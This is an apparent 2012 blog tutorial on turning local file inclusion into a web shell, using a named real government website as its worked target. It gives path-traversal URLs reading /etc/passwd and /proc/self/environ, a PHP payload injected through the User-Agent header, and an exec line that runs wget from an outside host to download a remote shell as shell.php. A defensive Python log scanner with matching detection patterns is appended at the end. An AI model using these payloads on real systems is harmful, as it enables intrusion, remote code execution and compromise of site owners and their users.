Monday, August 27, 2012

Local File Inclusion to shell upload


Tutorial provided by


Things you will need:

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ )
4) Mozilla Firefox

First of all, check that your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it).
Try to open /etc/passwd.

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd


OK, fine... we can open /etc/passwd.
Now request /proc/self/environ instead.

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.

Go to Tools > Default User-Agent > Edit User Agents
You will get this window.

Now make new user-agent
Go to New > New User-Agent
Now leave everything as it is except the description and the user-agent string.
In Description enter a name for it (mine is phpinfo).

In User-Agent paste this in there.


Code:
<?php phpinfo();?>


Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your User-Agent is called).

Go to your site and refresh it.
Now search for "disable_functions" (Ctrl+F Search function)

Mine is

Code:
disable_functions     | no value    | no value


That is good. We can spawn our shell now!

Now go back and edit your User-Agent.

Change "User-Agent" to:

Code:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>


(What does this do? It downloads the shell, which is hosted as a .txt file, and saves it as shell.php.)

Save it and refresh your site.

Go to http://www.yourLFIsite.com/shell.php (mine is http://www.bislig.gov.ph/shell.php).

Voila, we have our shell up.
Enjoy.
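From the defender's side, every step of this walkthrough leaves a footprint in the web server's access log: repeated ../ segments, reads of /etc/passwd and /proc/self/environ, and a PHP open tag sitting in the User-Agent header. The following scanner is an added example, not part of the original tutorial; the log lines are constructed for illustration (documentation-range IPs), and the Apache combined log format is assumed.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (sample data made up for this
# example; the IPs are documentation ranges, not real clients).
SAMPLE_LOG = """\
203.0.113.7 - - [27/Aug/2012:10:00:01 +0000] "GET /content1.php?page=5&directLinks=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Aug/2012:10:00:09 +0000] "GET /content1.php?page=5&directLinks=..%2F..%2F..%2Fproc/self/environ HTTP/1.1" 200 2210 "-" "<?php phpinfo();?>"
198.51.100.3 - - [27/Aug/2012:10:01:15 +0000] "GET /content1.php?page=5&directLinks=news HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r'(?:\.\./){2,}')               # repeated ../ segments
SENSITIVE = ('/etc/passwd', '/proc/self/environ')      # files the tutorial reads via LFI
PHP_TAG = re.compile(r'<\?(?:php|=)?', re.IGNORECASE)  # PHP open tag smuggled in a header

def classify(line):
    """Return (ip, [findings]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so %252E%252E%252F style double-encoding does not hide ../
    path = unquote(unquote(m['path']))
    findings = []
    if TRAVERSAL.search(path):
        findings.append('traversal')
    if any(s in path for s in SENSITIVE):
        findings.append('sensitive-file')
    if PHP_TAG.search(m['ua']):
        findings.append('php-in-user-agent')
    return m['ip'], findings

def scan(log_text):
    """Return only the suspicious lines as a list of (ip, findings)."""
    hits = []
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[1]:
            hits.append(result)
    return hits

if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ', '.join(findings))
```

A source IP that pairs 'sensitive-file' with 'php-in-user-agent' within a short window is the pattern this tutorial produces, and a good trigger for checking the web root for newly written .php files.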
